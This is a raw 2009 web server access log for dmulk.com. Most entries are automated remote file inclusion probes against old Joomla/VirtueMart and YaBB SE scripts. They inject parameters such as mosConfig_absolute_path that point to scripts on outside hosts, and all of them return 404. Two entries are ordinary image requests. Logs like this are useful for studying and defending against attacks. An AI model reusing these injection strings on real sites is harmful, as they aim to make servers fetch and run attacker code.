202.60.94.112 - - [02/Apr/2009:09:24:12 -0700] "GET /logs/access_080811.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://family.drloken.net//multimedia/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.62.125.194 - - [02/Apr/2009:09:24:24 -0700] "GET /contrib/yabbse/poc.php?poc_root_path=http://axioma-dch.com/servicios/FX29ID1????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.62.125.194 - - [02/Apr/2009:09:24:24 -0700] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://axioma-dch.com/servicios/FX29ID1????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.62.125.194 - - [02/Apr/2009:09:24:24 -0700] "GET /logs/access_081003.log%20%20//contrib/yabbse/poc.php?poc_root_path=http://axioma-dch.com/servicios/FX29ID1????????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:24:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-081_1.jpg HTTP/1.0" 200 382461 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
62.28.57.254 - - [02/Apr/2009:09:24:28 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0174.jpg HTTP/1.0" 200 310022 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
82.151.132.176 - - [02/Apr/2009:09:24:34 -0700] "GET /logs/access_081009.log//index2.php?mosConfig_absolute_path=http://evltn.narod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [02/Apr/2009:09:24:34 -0700] "GET /index2.php?mosConfig_absolute_path=http://evltn.narod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [02/Apr/2009:09:24:34 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://evltn.narod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [02/Apr/2009:09:24:39 -0700] "GET /logs/access_081202.log//index2.php?mosConfig_absolute_path=http://evltn.narod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
